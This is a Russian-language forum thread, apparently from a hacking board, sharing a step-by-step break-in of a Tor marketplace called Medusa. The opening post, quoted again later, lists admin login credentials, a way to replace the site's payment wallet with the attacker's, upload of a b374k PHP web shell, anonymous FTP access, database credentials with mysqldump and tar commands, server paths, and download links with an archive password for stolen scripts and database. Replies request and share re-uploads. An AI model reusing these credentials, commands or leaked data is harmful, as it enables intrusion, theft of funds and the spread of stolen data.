Сливаем MEDUSA - НакроФейкШоп

[tabac]

Некий утырок, решил создать аналог Hydra.
Но на Monero ну и как обычно) кидалово.
УРЛ этого чуда в торе medusas6rqee6x6e.onion


залазием

админка

http://medusas6rqee6x6e.onion/tesla/login
feret
feret123

тут стоит дальше бейсик, но мы сморкнулись и уже залогинены.

далее идем на http://medusas6rqee6x6e.onion/tesla/setting
в поле "BTC кошелек для пополнения баланса"  можно подменить его кошелек на наш (Monero) ыыыыы

и далее идем на:
http://medusas6rqee6x6e.onion/tesla/elfinder
и льем PHP шелл (лучше b374k(он идеально там работает)
и далее ловим его тут:
http://medusas6rqee6x6e.onion/storage/uploads/ - shell.php

инфа

http://medusas6rqee6x6e.onion/webftp/ - ихнее фтп, работает анонимный доступ. (anonymous:anonymous)

https://181.174.166.213:2031/pma/index.php - mysql
mysqldump -u meduzav2_meduza -p  beOth9SL meduzav2_meduza

далее инфа:

mysqldump -umeduzav2_meduza -p  beOth9SL meduzav2_meduza > "medusa_$dt.sql"
tar --exclude="meduza.hybra2web.cn/.git" --exclude="meduza.hybra2web.cn/vendor" --exclude="meduza.hybra2web.cn/node_modules" -czvf "medusa_$dt.tar.gz" meduza.hybra2web.cn

пути
/home/meduzav2/public_html/meduza.hybra2web.cn/public/uploads/files/
/home/meduzav2/public_html/meduza.hybra2web.cn/public/vendor/adminlte/bower_components/datatables.net/js/data.php
b374k   (шелл, уже удалили, но лейте чтото типа b374k)

http://medusas6rqee6x6e.onion/vendor/adminlte

уже слитая инфа (СКРИПТЫ и БАЗА)

скачать скрипты https://files.fm/f/4nvgav86
скачать базу https://files.fm/f/tfraqncu

p.s файлы живут 2 месяца

пароль на архив

gfcvh34CFVGBHjxexploit.in

всем успехов) не вредите друг другу) кому было полезно - зашибись)

взято с exploit.in
автор @MegaDostup

 

[Karmac0ma]

Я богат.
Достаточно качественный фейк.

 

[Galleon]

Может кто перезалить? Хочу ознакомится.

 

[netcat]

интересно.
Некий утырок, решил создать аналог Hydra.

получается чел ломал фейк не ради интереса, а в интересах реального шопа ? или мне показалось )

 

[whitehack]

Перезалейте пожалуйста

 

[MuttWalker]

Некий утырок, решил создать аналог Hydra.
Но на Monero ну и как обычно) кидалово.
УРЛ этого чуда в торе medusas6rqee6x6e.onion


залазием

админка

http://medusas6rqee6x6e.onion/tesla/login
feret
feret123

тут стоит дальше бейсик, но мы сморкнулись и уже залогинены.

далее идем на http://medusas6rqee6x6e.onion/tesla/setting
в поле "BTC кошелек для пополнения баланса"  можно подменить его кошелек на наш (Monero) ыыыыы

и далее идем на:
http://medusas6rqee6x6e.onion/tesla/elfinder
и льем PHP шелл (лучше b374k(он идеально там работает)
и далее ловим его тут:
http://medusas6rqee6x6e.onion/storage/uploads/ - shell.php

инфа

http://medusas6rqee6x6e.onion/webftp/ - ихнее фтп, работает анонимный доступ. (anonymous:anonymous)

https://181.174.166.213:2031/pma/index.php - mysql
mysqldump -u meduzav2_meduza -p  beOth9SL meduzav2_meduza

далее инфа:

mysqldump -umeduzav2_meduza -p  beOth9SL meduzav2_meduza > "medusa_$dt.sql"
tar --exclude="meduza.hybra2web.cn/.git" --exclude="meduza.hybra2web.cn/vendor" --exclude="meduza.hybra2web.cn/node_modules" -czvf "medusa_$dt.tar.gz" meduza.hybra2web.cn

пути
/home/meduzav2/public_html/meduza.hybra2web.cn/public/uploads/files/
/home/meduzav2/public_html/meduza.hybra2web.cn/public/vendor/adminlte/bower_components/datatables.net/js/data.php
b374k   (шелл, уже удалили, но лейте чтото типа b374k)

http://medusas6rqee6x6e.onion/vendor/adminlte

уже слитая инфа (СКРИПТЫ и БАЗА)

скачать скрипты https://files.fm/f/4nvgav86
скачать базу https://files.fm/f/tfraqncu

p.s файлы живут 2 месяца

пароль на архив

gfcvh34CFVGBHjxexploit.in

всем успехов) не вредите друг другу) кому было полезно - зашибись)

взято с exploit.in
автор @MegaDostup

Бро, перезалей пожалуйста!!))

 

[GoATP]

database18.07.2019.rar - AnonFiles

anonfiles.com

database18.07.2019.rar - AnonFiles

anonfiles.com

 

[GoATP]

[CLIKE]

bd.rar - AnonFiles

anonfiles.com

[/CLIKE]

 

[MuttWalker]

Скрытое содержимое

Бро, а пасс то какой?
Местный не подходит

 

[Bard]

Бро, а пасс то какой?
Местный не подходит

Пасс есть в теме.
Поищи внимательнее )

 

[Fireman112]

ачать скрипты

мне нужен скрипт только. можно перезалит?

 

[rx26386]

new link:

bd.rar

pass: gfcvh34CFVGBHjxexploit.in

 

[Fireman112]

new link:

Скрытое содержимое
Скрытое содержимое

При извлечение .tar дало ошибка.
пока не пояснил но думаю скрипт норм.
спасибо!

 

[rx26386]

just tested the download myself... no errors, everything fine.

 

[Fireman112]

just tested the download myself... no errors, everything fine.

/usr/bin/gtar: meduza.hybra2web.cn/public/storage: Cannot create symlink to `/home/meduzav2/public_html/meduza.hybra2web.cn/storage/app/public': No such file or directory
/usr/bin/gtar: Exiting with failure status due to previous errors

please upload MEGA

 

[injector1316]

у кого осталось архив кроме bd.rar ?

 

[apatride]

Малость непонятно, почему народ выкладывал под хайд линки, когда сам ТС выдал их без хайда?
Если у кого остался в архивах поделитесь живыми линками для изучения!

 

[bbi34yy]

У меня вся база, которая 2 гига в tar'е весит. Это оно?

 

[Injector47]

у меня bd.rar 257 метров весит.
да, нужны оба файла !

 

[moninger]

дайте пж живой линк на бд и скрипт. хочу чекнуть что за зверь